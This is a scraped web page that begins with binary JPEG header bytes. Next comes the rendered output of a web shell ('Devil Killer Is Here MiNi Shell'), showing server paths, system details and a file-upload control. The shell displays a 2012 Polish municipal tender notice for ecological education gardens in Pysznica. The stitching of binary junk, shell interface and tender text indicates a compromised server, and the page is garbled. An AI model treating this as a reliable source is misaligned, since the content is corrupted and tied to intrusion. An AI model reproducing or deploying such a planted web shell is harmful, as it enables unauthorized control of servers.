JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120629/227252-N-2012.html

<p class="kh_header"><b>Pysznica: Centra edukacji ekologicznej w gminie Pysznica</b><br>
<b>Numer ogłoszenia: 227252 - 2012; data zamieszczenia: 29.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pysznica , ul. Wolności 277/04, 37-403 Pysznica, woj. podkarpackie, tel. 015 8410198, faks 015 8410017.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pysznica.bip.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Centra edukacji ekologicznej w gminie Pysznica.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	 Zakres projektu: -Centra edukacji ekologicznej w gminie Pysznica- obejmuje dostawę wraz z robotami budowlanymi i usługami, w szczególności: 

Zadanie nr 1:
       Zielone zakątki - ogródek ekologiczny przy Przedszkolu w Pysznicy pow. ok. 3452 m2

1)	Przygotowanie terenu
a) usunięcie warstwy ziemi urodzajnej o grubości do 15 cm za pomocą spycharek 
b)  przygotowanie terenu pod obsadzenia kwiatowe z wymianą gleby rodzimej, warstwa ziemi  o grubości 25 cm 
c)  przygotowanie terenu pod obsadzenia kwiatowe z wymianą ziemi o grubości 10 cm 
d) rozścielenie ziemi urodzajnej spycharkami na terenie płaskim 
e)  wykonanie trawników parkowych siewem na terenie płaskim przy uprawie mechanicznej na gruncie kat III 
z nawożeniem 
f) wykonanie łąk kwiatowych siewem na całej powierzchni rzutem 
g) wykonanie zakątka górskiego - budowa partii skalnych z kamienia łamanego ukwieconych bylinami na skarpach 
h) wykonanie oczka wodnego :
- roboty ziemne z przewozem gruntu taczkami na odległość do 10 m (kat. gruntu III) wykonanie oczka wodnego
- rozplantowanie ręczne ziemi wydobytej z wykopów za 1 m3 - kat. gr. III
- izolacja z folii
- wykonanie kaskady - narzutu kamiennego podwodnego z kamienia ciężkiego lub średniego luzem z brzegu 
z wyładunkiem ręcznym przy wys. burt do 0.61-1.50 m wraz z montażem pompki

2)	Nasadzenia
a)	sadzenie drzew i krzewów oraz bylin na terenie płaskim w gruncie kat. III bez zaprawy dołów śr./głębok. 0,5 m
b)	obsadzenie kwietników roślinami cebulkowymi 
c)	ściółkowanie agrowłókniną na terenie płaskim 
d)	ręczne ściółkowanie korą na terenie płaskim gr. warstwy 2 cm
e)	ręczne ściółkowanie kamykiem na terenie płaskim gr. warstwy 2 cm

3)	Nawierzchnie brukowe oraz ścieżki żwirowe
a)	mechaniczne wykonanie koryta na całej szerokości chodników w gruncie kat. I-IV głębokości 20 cm 
b)	warstwy odsączające wykonane i zagęszczone mechanicznie o gr. 10 cm
c)	obrzeża betonowe o wym. 20x6 cm. Na podsypce piaskowej z wyp. spoin piaskiem
d)	chodniki z kostki brukowej betonowej grubość 4 cm na podsypce cementowo-piaskowej  
z wypełnieniem spoin piaskiem (ok. 98 mb)

Zadanie nr 2:
       Zielona pracownia - ogród ekologiczny Park Olszynki w Pysznicy pow. ok. 6300 m2

1)	Przygotowanie terenu
a)	przygotowanie terenu pod obsadzenia kwiatowe w gruncie kat. III z uzupełnieniem gleby rodzimej, warstwa ziemi o grubości 5 cm 
b)	rozścielenie ziemi urodzajnej spycharkami na terenie płaskim 
c)	rozścielenie ziemi urodzajnej ręcznie z transportem taczkami na terenie płaskim
d)	mechaniczne plantowanie powierzchni gruntu kat. IV
e)	wykonanie trawników parkowych siewem na terenie płaskim przy uprawie mechanicznej na gruncie kat III 
z nawożeniem (4100 m2) 
f)	wykonanie łąk kwiatowych siewem na całej powierzchni rzutem (85 m2)

2)	Nasadzenia i zakładanie ogrodów tematycznych
a)	sadzenie drzew i krzewów oraz bylin na terenie płaskim w gruncie kat. III bez zaprawy dołów śr./głębok.
 0,5 m
b)	ściółkowanie agrowłókniną na terenie płaskim 
c)	ręczne ściółkowanie korą na terenie płaskim gr. warstwy 2 cm
d)	ręczne ściółkowanie kamykiem na terenie płaskim gr. warstwy 2 cm
e)	wykonanie ogrodu skalnego - budowa partii skalnych z kamienia łamanego ukwieconych bylinami na skarpach 

3)	Nawierzchnie brukowe oraz ścieżki żwirowe
a)	mechaniczne wykonanie koryta na całej szerokości chodników w gruncie kat. I-IV głębokości 20 cm 
b)	warstwy odsączające wykonane i zagęszczone mechanicznie o gr. 10 cm
c)	obrzeża betonowe o wym. 20x6 cm. na podsypce piaskowej z wyp. spoin piaskiem
d)	chodniki z kostki brukowej betonowej grubość 4 cm na podsypce cementowo-piaskowej z wypełnieniem spoin piaskiem (ok. 317 mb)
e)	podbudowa z kruszywa łamanego warstwa dolna o grubości po zagęszcz. 15 cm
f)	podbudowa z kruszywa łamanego warstwa górna o grubości po zagęszcz. 8 cm
g)	podbudowa z kruszywa łamanego - otoczaków warstwa górna o grubości po zagęszcz. 15 cm
h)	nawierzchnie z cegły/żwirowe grub. 6 cm na podsypce cementowo-piaskowej (ok. 194 mb)

Cały teren Zielonej pracowni będzie podzielony ścieżkami na kwatery - ogrody tematyczne (ogród leśny, ogród wiejski, ogród piaszczysty suchy, ogród skalny (górski-piarg), ogród biocenotyczny, ogród porządkowy z kompostownikiem.

Zadanie nr 3:
Zielone oko - ogród ekologiczny w Jastkowicach przy ul. Podleśnej wokół stawu zwanego Ługiem pow. ok. 4100 m2

1)	Przygotowanie terenu
a.	ręczne ścinanie i karczowanie zagajników średniej gęstości
b.	wywożenie karpiny na odległość do 2 km
c.	wykopy oraz przekopy wykonane koparkami przedsiębiernymi 0.15 m3 na odkład w gruncie kat. III (odmulenie dna zbiornika wodnego)
d.	przemieszczenie spycharkami mas ziemnych na odległość do 10m w gruncie kat. III
e.	plantowanie skarp zbiornika wodnego kat. gr. III przy robotach wodno-melioracyjnych
f.	wykonanie opasek pojedynczych z kiszek faszynowych o śr. 20 cm w gruncie kat. III
g.	przygotowanie i rozścielenie warstwy wegetacyjnej z mieszanki wykonanej poza terenem rozścielenia ręczne o gr. warstwy po zagęszczeniu 10 cm
h.	wykonanie trawników dywanowych siewem na gruncie kat. III z nawożeniem 
i.	tworzenie ogrodu biocenotycznego (pozostającego bez ingerencji człowieka) 60 m2

2)	Nasadzenia i zakładanie ogrodów tematycznych
a.	sadzenie drzew i krzewów liściastych na terenie płaskim w gruncie kat. III bez zaprawy dołów śr./głębok.  0,7 m
b.	obsadzenie stawu roślinami wodnymi bezpośrednio na dnie

2.	 Zakres dostaw wyposażenia i urządzeń dla wszystkich zadań:

Lp.	Rodzaj	Ilość

CEE Zielone zakątki

1.	Ławki parkowe	7 szt.
2.	Kosze na śmieci z segregatorami	9 szt.
3.	Stojak an rowery	1 szt.
4.	Stoły i ławki	5 kpl.
6.	Tablice informacyjno-opisowe (0,3 m2)	2 szt.
7.	Budki lęgowe, karmiki, poidełka dla ptaków	17 szt. (karmiki 4 szt., budki lęgowe 10 szt., poidełka 3 szt.)
8.	Pawilon ogrodowy z zadaszeniem (bez ścian bocznych)	1 szt. (25 m2)
9.	Trejaże, podpory, kratki z krawędziaków  zakotwionych metalem w słupki betonowe	16 szt.
10.	Pergola	3 szt.
11.	Kompostownik	1 szt.
12.	Mostek i drewniana palisada	1 kpl.
13.	Nasadzenia (drzewa, krzewy, pnącza, byliny)	556 szt.

CEE Zielona pracownia

1.	Ławki parkowe	21 szt.
2.	Stojak na rowery	1 szt.
3.	Pergola	4 szt.
4.	Kompostownik	1 szt.
5.	Płotek z okrąglaków	1 szt. (47 m2)
6.	Trejaże, kratki z krawędziaków  zakotwionych metalem w słupki betonowe	12 szt.
7.	Zegar słoneczny	1 szt.
8.	Kosze na śmieci z segregatorami	4 szt.
9.	Stoły i ławki	5 kpl.
10.	Tablice informacyjno-opisowe	7 szt.
11.	Tablice informacyjne-gabloty	3 szt.
12.	Budki lęgowe, karmiki, poidełka dla ptaków	20 szt. (karmiki 5 szt., budki lęgowe 11 szt., poidełka 4 szt.)
13.	Nasadzenia (drzewa, krzewy, pnącza, byliny)	781 szt.

CEE Zielone oko

1.	Ławki parkowe	6 szt.
2.	Stoły i ławki	4 kpl.
3.	Mini molo z balustradą (wykonanie pokładów z bali gr. 50 mm pomostów drewnianych - molo oraz balustrady drewnianej)	1 kpl.
4.	Tablice informacyjno-opisowe	2 szt.
5.	Ażurowy płotek zabezpieczający (od strony ulicy)	1 szt. (20 szt.)
6.	Stojak na rowery	1 szt.
7.	Nasadzenia	110 szt. (30 szt. kłącza roślin wodnych, 80 szt. drzewa i krzewy)

3.	Szczegółowy opis przedmiotu zamówienia z wyszczególnieniem pozycji tworzących zamówienie oraz wymagania Zamawiającego dotyczące parametrów technicznych określają: 
- Wykaz roślin - załącznik 7.1 do siwz,
- Warunki ogólne i techniczne wykonania zamówienia, w tym: dokumentacja projektowa (rysunki, specyfikacja ogólna, specyfikacja techniczna) - załącznik nr 7.2,
- Przedmiary - załącznik nr 7.3.
4.	Jeśli przy opisywaniu przedmiotu zamówienia użyto znaków towarowych, nazw handlowych materiałów oraz urządzeń (wyposażenia) należy traktować wyłącznie je jako przykładowe. Użycie ich służy bowiem tylko i wyłącznie doprecyzowaniu przedmiotu zamówienia. Wykonawcy w ofercie mogą zaproponować materiały           i urządzenia równoważne. 
5.	Wartość szacunkowa niniejszego zamówienia znajduje się w przedziale 14 000 do 200 000 euro, czyli jest mniejsza od kwot określonych w przepisach wydanych na podstawie art. 11 ust. 8 Pzp..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.45.13.00-9, 03.45.20.00-3, 03.44.10.00-3, 45.11.27.10-5, 45.11.27.12-9, 77.31.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 08.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości 2 000,00 PLN (słownie: dwa tysiące złotych). 
2. Wadium należy wnieść przed upływem ostatecznego terminu składania ofert, tj. do dnia 13 lipca 2012 r. do godz. 10:00. 
3. Wadium może być wniesione w jednej lub kilku następujących formach: 
a) pieniądzu (tylko przelewem z konta Wykonawcy na konto zamawiającego); 
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
c) gwarancjach bankowych; 
d) gwarancjach ubezpieczeniowych; 
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158 z późniejszymi zmianami). 
4. Przy wnoszeniu wadium Wykonawca winien powołać nazwę postępowania (wraz z nadanym mu oznaczeniem referencyjnym), a w przypadku wniesienia wadium w postaci wpłaty pieniężnej (przelew) dodatkowo wskazać nr rachunku bankowego, na który należy dokonać zwrotu wadium. 
5. Wadium wniesione w pieniądzu wpłaca się przelewem z rachunku Wykonawcy na wskazany niżej rachunek bankowy Zamawiającego, który założony jest w Banku Spółdzielczym Tarnobrzeg Oddział Nisko. 
     Nr rachunku bankowego, na który należy wpłacać wadium: 36 9434 1025 2006 1695 1311 0002, z zaznaczeniem: wadium - przetarg nieograniczony - znak sprawy: RI.I.271.9.2012.
      Wadium w formie poręczenia lub gwarancji musi obejmować cały okres związania ofertą, a beneficjentem takich dokumentów musi być Zamawiający. Poręczenia lub gwarancje muszą zawierać w swojej treści zobowiązania gwaranta/poręczyciela do nieodwołalnej i bezwarunkowej, na każde pierwsze pisemne żądanie Zamawiającego wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w przepisie art. 46 ust. 4a i 5 ustawy Pzp.
 6. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania rachunku Zamawiającego, natomiast przez skuteczne złożenie wadium w innej formie niż pieniężna należy rozumieć złożenie w formie w oryginału odpowiednich dokumentów w siedzibie Zamawiającego, tj. w Urzędzie Gminy w Pysznicy ul. Wolności 277, I piętro pok. nr 5 (sekretariat ), do dnia 13.07.2012 r. do godz. 10:00. 
7. Dowód wniesienia wadium należy dołączyć do oferty. 
8. Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną formą wadium, zostanie przez Zamawiającego wykluczony z postępowania. 
9. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a. 
10. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy. 
11. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 
12. Wadium wniesione w pieniądzu Zamawiający zwróci wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. 
13. Wykonawca utraci wadium (w przypadku wpłaty pieniężnej wraz z odsetkami) na rzecz Zamawiającego, w przypadku gdy jego oferta zostanie wybrana, a: 
a) Wykonawca odmówi podpisania umowy na warunkach określonych w ofercie; 
b) Wykonawca nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
c) zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy. 
14.  Zamawiający zatrzymuje wadium w sytuacji określonej w przepisie art. 46 ust. 4a ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca udokumentuje wykonanie, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie,  zgodnych z przedmiotem zamówienia, w szczególności wykonania, adaptacji lub pielęgnacji ogrodów lub terenów zielonych, o wartości brutto co najmniej 100 000,00 PLN (słownie: sto tysięcy złotych), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie.
Ocena spełnienia warunku dokonana będzie w oparciu o oświadczenia i dokumenty, które ma dostarczyć Wykonawca zgodnie z formułą spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca udokumentuje dysponowanie osobą, która będzie uczestniczyć w wykonaniu zamówienia, w szczególności posiadającą wiedzę i umiejętności z zakresu zagospodarowania terenów zieleni. Osoba ta winna posiadać wykształcenie ogrodnicze. 
 Ocena spełnienia warunków dokonana będzie w oparciu o oświadczenia i dokumenty, które ma dostarczyć Wykonawca zgodnie z formułą spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca udokumentuje posiadanie środków finansowych lub zdolności kredytowej wyrażających się kwotą co najmniej 100 000,00 PLN (słownie: sto tysięcy złotych).
Ocena spełnienia warunków dokonana będzie w oparciu o oświadczenia i dokumenty, które ma dostarczyć Wykonawca zgodnie z formułą spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

